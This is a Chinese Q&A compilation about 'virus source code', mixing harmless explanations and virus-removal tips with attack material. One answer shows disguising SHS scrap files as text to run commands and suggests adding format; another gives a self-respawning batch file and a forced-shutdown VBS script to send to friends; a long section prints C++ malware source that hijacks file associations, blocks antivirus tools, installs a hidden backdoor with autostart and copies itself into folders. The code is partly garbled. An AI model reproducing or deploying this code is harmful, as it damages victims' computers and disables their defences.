文本病毒源码

‘壹’ 谁能给个shs病毒的源码小例子

如果你从网上下载了一个txt文件，你可曾想过它有可能是病毒吗?可能有些人安全意识较高，会扫描所有从网上下载的资料，可是如果连杀毒软件也认为这不是病毒，你还会怀疑它吗？我想大多数人都会双击这个txt文件进行阅读了。可能有些人听说过exe文件通过更改文件名为XXX.txt.exe这种形式来伪装，但这大多数都会被杀毒软件毫不留情的揪出来。可是今天我们介绍的一种文件却是实实在在的系统文件，可是它对我们的电脑却有着致命的危害。这就是SHS文件。什么是SHS文件呢？我们知道，在windows系统下，我们在不同的文件间复制信息时，系统是将对象包装成一个碎片对象来进行复制的。这种技术称为Shell Scrap Object,简称（SSO）。可是如果我们没有将对象粘贴在另一个文件中，而是直接粘贴在硬盘上呢？这时我们会发现，出现了一个图标特异的文件，这个文件便是SHS碎片文件。大家可以进行如下尝试，打开word，随便输入一段话，然后，选中一段话，直接按住左键将这些内容拉到硬盘上，你便会看到，生成了一个碎片文件。如果黑客对它进行更换图标，便可以骗过大多数人，让大家误以为这只是一个txt文件。可能有人说，SHS文件应该后缀不同吧，怎么可能看不出来呢？是的，可是你知道吗？windows是支持双后缀的，，即使你点上了“显示已知文件类型的扩展名”，SHS文件所显示出来的依然是txt文档文件。因为它本来就是如假包换的文本，而且还是系统文件！只不过它不完整罢了。任何杀毒软件都不会认为它是系统的危胁。下面我们一简单制作一个危险的SHS文件，当然代码是我们写的，我们不用担心它会破坏系统。
我们先在任意盘符下新建一个txt文件，任意输入几个字符。在运行中输入packager.exe，会出现对象包装程序，然后点文件--导入，导入刚才新建的文档（一定要输入几个字符，否则是无法导入的）。然后点击编辑-----命令行，这个便是这个文档执行的操作了，这里我们输入"cmd /c dir c:\ & pause"好了，让它列出你的C盘目录，点确定。然后点编辑------复制包，然后在任意盘符下粘贴。最后双击运行即可，系统会提示你是否要运行，点运行。这时我们会发现，出现了cmd窗口，窗口中的内容是你的C盘目录，点任意键退出即可。
从上面的例子我们知道，如果在命令中加个format，我们会有什么损失，大家都清楚吧？
当然，SHS文件的攻击是完全可以防止的，方法如下：
1。去掉HKEY_CLASSES_ROOT\ShellScrap\shell\open\command下面的的SHS文件关联
2。在HKEY_CLASSES_ROOT\ShellScrap键下，有一个键值“NeverShowExt”,它是导致SHS文件无法显示扩展名的祸首，只要删除这个键值，SHS文件便会显示出它的扩展名了。
3。SHS文件与文档有类似的图标，易麻痹人，我们可以给它换一个图标。方法是打开资源管理器，点工具----文件夹选项，选文件类型，在已注册文件类型中选中SHS文件，选高级，点更改图标，更改一个与文档有较大区别的图标即可.

‘贰’ 如何查看病毒的源代码

源代码（也称源程序），是指一系列人类可读的计算机语言指令。

在现代程序语言中，源代码可以是以书籍或者磁带的形式出现，但最为常用的格式是文本文件，这种典型格式的目的是为了编译出计算机程序。计算机源代码的最终目的是将人类可读的文本翻译成为计算机可以执行的二进制指令，这种过程叫做编译，通过编译器完成。

作用 ：

源代码主要功用有如下2种作用：

生成目标代码，即计算机可以识别的代码。

对软件进行说明，即对软件的编写进行说明。为数不少的初学者，甚至少数有经验的程序员都忽视软件说明的编写，因为这部分虽然不会在生成的程序中直接显示，也不参与编译。但是说明对软件的学习、分享、维护和软件复用都有巨大的好处。因此，书写软件说明在业界被认为是能创造优秀程序的良好习惯，一些公司也硬性规定必须书写。

需要指出的是，源代码的修改不能改变已经生成的目标代码。如果需要目标代码做出相应的修改，必须重新编译。

‘叁’ 病毒源代码怎么用

病毒的形式有许多种,有的是脚本,有的是安装程序,很多种类型,不同类型的病毒有不同的写法,或是生成的方法,你看到的应该是脚本代码,用文本记下后,改后缀名字,具体后缀名也不同,

‘肆’ 什么是电脑病毒代码

病毒代码是可以给计算机造成破坏的恶意程序的代码，这个代码生成的程序就是病毒。病毒是由一些试图对他人电脑进行破坏或者其他商业利益行为而驱使一些人制作的。

‘伍’ 求病毒样本以及源代码

1.新建一个记事本

2.把下面代码增贴进去

@echo off
start cmd
%0

3.增贴后，点击文件 - 另存为

4.输入文件名，在文件名后面加上.bat

5.然后发给好友就可以了！

（发送好友的时候，就好就加个壳，右键文件 - 压缩文件 即可！）

PS：力相当的厉害，所以请勿弄过火，否则后果自负！

文件“我是猪”让好友关机

相信有的人知道是什么，有的人不知道是什么

总之这个是让别人关机的东西。

那怎么制作呢？

其实很简单， - 小威 - 今天给大家的教程是：文件“我是猪”让好友关机

制作方式：

1.点击桌面 - 右键 - 新建 - 文本文档

2.打开这个 文本文档

3.把这些代码复制到 文本文档上去

on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""一分钟关你机，不信，试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说 ""我是猪""0","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"

4.复制好后，点击 文件 - 另存为 - 桌面 - 然后输入名字的时候，在名字的后面加上 .vbe

比如我要输入的名字是：小威 则改成 小威.vbe

然后点击保存、

然后把这个东西发给好友，只要好友一打开。

如果好友不输入：我是猪的话，则立即关机。

教程到这。

‘陆’ 把病毒源代码复制在电脑的文本里会怎么样

那个测试是没有什么价值的，并不能真正测试出一个杀软的好坏，其实也没什么好坏之分，一个杀软用时间长了，不怎么中毒，用的顺手，就是一个好杀软！

‘柒’ 病毒源代码是什么

刚才我答了一个帖子。正好也能用来回答你的问题。
是这样的，要彻底的杀掉病毒，并不需要知道病毒源代码。其实，就算知道了病毒源代码对我们杀毒也起不了太大的作用（为了消除歧异：在一些情况下，知道文件的源代码，对文件的操作是非常有帮助的）。

下面，就如何完整的杀掉病毒解释如下，如果觉得好，就给点儿分吧。呵呵：

1 若知道机器中了病毒。也就是杀毒软件已经找到了病毒，操作方法如下：
1）得到病毒名称，一般可以通过查找杀毒软件的历史记录得到。如某病毒为“A.abc”
2) 到Google或网络搜索“A.abc”得到该病毒的详细信息。一般来讲，详细信息包括病毒文件的存储位置以及该病毒的注册表信息。
3）按Ctrl+Alt+Del打开Windows任务管理器，点击进程标签查看进程信息，若有“A.abc”，则关闭此进程，再关闭任务管理器；若无，则关闭任务管理器。
4） 按照刚才在Google或网络得到的文件存储位置找到病毒文件，手工删除病毒文件。若成功删除，进行第5）步，若不能成功删除，则进行第5）步，然后返回第4）步删除病毒文件
5）按照刚才在Google或网络得到的文件注册表信息找到该病毒的注册表信息并删除。
打开注册表：
开始－>运行->输入“regedit”，回车。
按照在网络或Google的查询结果寻找病毒注册表信息：
HKLM -> Software -> Microsoft -> winodws -> currentVersion -> Run
右侧应该有：
loadyt2"%systemroot%\inf\A.abc"点击删除。

2 若不确定机器是否中病毒，则操作方法如下：
1）按Alt＋Ctl＋Del打开任务管理器，点击进程标签查看进程信息。看见似乎像是病毒的进程，将进程名字作为搜索条件在网络或Google中搜索。
2）若搜索结果显示其果真为病毒，则按照第1种情况的第3）步开始执行。
3）若搜索结果表明其不是病毒，则不要结束该进程。否则若您对操作系统的了解不深入的话，容易造成不悦后果。

‘捌’ 文件夹图标病毒的病毒源代码

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,\);
}
//此处只在系统根目录下有效
sprintf(HiJack,%s%s\,DirUrl,AfxGetApp()->m_pszAp pName);
//判断是否存在。
可以打开
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,explorer.exe %s,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持txt、exe文件，并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={USBCleaner,
Kis,
Kav,
IceSword,
Kill,
WSYSCHECK,
360};
//获取参数并判断
if(strcmp(m_lpCmdLine,))//如果有参数
{
//判断特征字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strp(m_lpCmdLine)),
_strupr(_strp(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(.)) 1;
CString cmd;
// if(!wcscmp(ext,_T(txt)))
if(strstr(m_lpCmdLine,_T(.txt))||strstr(m_lpCmdL ine,_T(.TXT)))
{
cmd.Format(%s %s,notepad.exe,m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(.exe))||strstr(m_lpCmdL ine,_T(.EXE)))
{
//此处不完美。
判断文件名
if(!check)
{
// AfxMessageBox(文件已损坏！);
::MessageBox(NULL,文件已损坏！请重新安装应用程序！,Microsoft,MB_OK);
return FALSE;
}
else
cmd.Format(%s,m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打开文件
OpenFuckFile();
3、自启动及实现劫持exe、txt文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
CloseHandle(hMole);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,\SysKernel.exe);
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysKernel,REG_SZ,FileNew,0,0);
//写注册表，进行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,%s %%1,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ txtfile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ exefile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
4、释放后门，并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, \SysService.exe);
ReleaseResource(IDR_BIN, BIN, strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现后门自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysService,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
LPSTR lp;
CString strLogdrive;
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干坏事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(*.*);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
// CloseHandle(hMole);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,%s%s,finder.GetFilePath(),.exe );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

‘玖’ 病毒源代码

刚才我答了一个帖子。正好也能用来回答你的问题。
是这样的，要彻底的杀掉病毒，并不需要知道病毒源代码。其实，就算知道了病毒源代码对我们杀毒也起不了太大的作用（为了消除歧异：在一些情况下，知道文件的源代码，对文件的操作是非常有帮助的）。

下面，就如何完整的杀掉病毒解释如下，如果觉得好，就给点儿分吧。呵呵：

1 若知道机器中了病毒。也就是杀毒软件已经找到了病毒，操作方法如下：
1）得到病毒名称，一般可以通过查找杀毒软件的历史记录得到。如某病毒为“A.abc”
2) 到Google或网络搜索“A.abc”得到该病毒的详细信息。一般来讲，详细信息包括病毒文件的存储位置以及该病毒的注册表信息。
3）按Ctrl+Alt+Del打开Windows任务管理器，点击进程标签查看进程信息，若有“A.abc”，则关闭此进程，再关闭任务管理器；若无，则关闭任务管理器。
4） 按照刚才在Google或网络得到的文件存储位置找到病毒文件，手工删除病毒文件。若成功删除，进行第5）步，若不能成功删除，则进行第5）步，然后返回第4）步删除病毒文件
5）按照刚才在Google或网络得到的文件注册表信息找到该病毒的注册表信息并删除。
打开注册表：
开始－>运行->输入“regedit”，回车。
按照在网络或Google的查询结果寻找病毒注册表信息：
HKLM -> Software -> Microsoft -> winodws -> currentVersion -> Run
右侧应该有：
loadyt2"%systemroot%\inf\A.abc"点击删除。

2 若不确定机器是否中病毒，则操作方法如下：
1）按Alt＋Ctl＋Del打开任务管理器，点击进程标签查看进程信息。看见似乎像是病毒的进程，将进程名字作为搜索条件在网络或Google中搜索。
2）若搜索结果显示其果真为病毒，则按照第1种情况的第3）步开始执行。
3）若搜索结果表明其不是病毒，则不要结束该进程。否则若您对操作系统的了解不深入的话，容易造成不悦后果。

‘拾’ 怎样察看病毒文件源代码（有追加分）

鼠标右击病毒文件
选择用记事本或一些功能更强的编辑软件打开